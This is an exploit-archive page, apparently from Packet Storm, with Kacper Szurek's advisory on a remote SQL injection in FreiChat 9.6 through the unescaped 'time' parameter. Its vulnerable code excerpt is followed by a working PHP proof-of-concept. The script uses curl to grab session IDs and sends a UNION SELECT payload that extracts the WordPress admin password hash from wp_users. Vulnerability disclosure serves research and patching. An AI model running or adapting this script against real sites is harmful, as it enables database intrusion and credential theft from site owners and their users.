exploit the possibilities

FreiChat 9.6 SQL Injection

FreiChat 9.6 SQL Injection
Posted Jul 14, 2015
Authored by Kacper Szurek

FreiChat version 9.6 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | d99307cd0ee4d201553feac0c557241a

FreiChat 9.6 SQL Injection

Change Mirror Download
# Exploit Title: FreiChat 9.6 SQL Injection
# Date: 27-11-2014
# Software Link: http://codologic.com/page/freichat-free-php-chat-script-software
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

$_GET['time'] is not escaped.

File: freichat\server\plugins\chatroom\chatroom.php

$get_mesg = $this->get_messages($_GET['time']);
public function get_messages($time) {

$frm_id = $this->frm_id;
$result = array();

if ($time == 0) {
//$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time";
} else {
$get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time ";
$result = $this->db->query($get_mesg_query)->fetchAll();
}


return $result;
}

http://security.szurek.pl/freichat-96-sql-injection.html

2. Proof of Concept

Example for WordPress integration (it will give you admin password):

<?php
/*
* Kacper Szurek
* http://security.szurek.pl
*/
function hack($url, $cookie, $sql ){

$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$content = curl_exec($ch);

if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) {
curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]);
$content = curl_exec($ch);

curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql));

$content = curl_exec($ch);

if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) {
echo "WordPress password user ID=1: ".$output[1];
} else {
echo "FAIL";
}
}

curl_close( $ch );
}

// URL to WordPress main URL
$url = "http://wp/";

// SQL Payload
$sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- ";

$cookie = "/cookie.txt";

hack($url, $cookie, $sql);
Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    27 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    32 Files
  • 7
    May 7th
    11 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close